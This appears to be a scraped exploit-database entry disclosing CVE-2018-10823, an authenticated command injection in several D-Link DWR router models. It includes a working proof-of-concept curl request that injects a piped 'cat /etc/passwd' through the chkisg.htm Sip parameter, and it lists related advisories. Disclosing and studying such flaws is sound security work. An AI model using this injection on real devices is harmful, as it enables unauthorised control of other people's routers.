Lucene search
Blazej Adamczyk1337DAY-ID-31402HistoryOct 25, 2018 - 12:00 a.m.
D-Link Routers - Command Injection Vulnerability
2018-10-2500:00:00
Blazej Adamczyk
0day.today
86
0.967 High
EPSS
Percentile
99.6%
Exploit for hardware platform in category web applications
## Shell command injection
CVE: CVE-2018-10823
CVSS v3: 9.1
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Description: An issue was discovered on D-Link routers:
DWR-116 through 1.06,
DWR-512 through 2.02,
DWR-712 through 2.02,
DWR-912 through 2.02,
DWR-921 through 2.02,
DWR-111 through 1.01,
and probably others with the same type of firmware.
An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.
PoC:
Login to the router.
Request the following URL after login:
`$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd`
See the passwd file contents in the response.
# 0day.today [2018-10-25] #Related
attackerkb
attackerkb
CVE-2018-10823
2018-10-17 00:00:00
cve
cve
CVE-2018-10823
2018-10-17 14:29:00
nuclei
nuclei
D-Link Routers - Remote Command Injection
2021-10-18 12:56:22
prion
prion
Design/Logic Flaw
2018-10-17 14:29:00
exploitpack
exploitpack
D-Link Routers - Command Injection
2018-10-12 00:00:00
exploitdb
exploitdb
D-Link Routers - Command Injection
2018-10-12 00:00:00
checkpoint_advisories
checkpoint_advisories
Linux System Files Information Disclosure (CVE-2018-10823; CVE-2018-3948)
2014-06-16 00:00:00
packetstorm
packetstorm
D-Link Plain-Text Password Storage / Code Execution / Directory Traversal
2018-10-18 00:00:00
openvas
openvas
D-Link DIR/DWR Devices Multiple Vulnerabilities (Oct 2018) - Active Check
2018-11-26 00:00:00
threatpost
threatpost
Multiple D-Link Routers Open to Complete Takeover with Simple Attack
2018-10-17 15:24:27
thn
thn
New EnemyBot DDoS Botnet Borrows Exploit Code from Mirai and Gafgyt
2022-04-14 10:07:00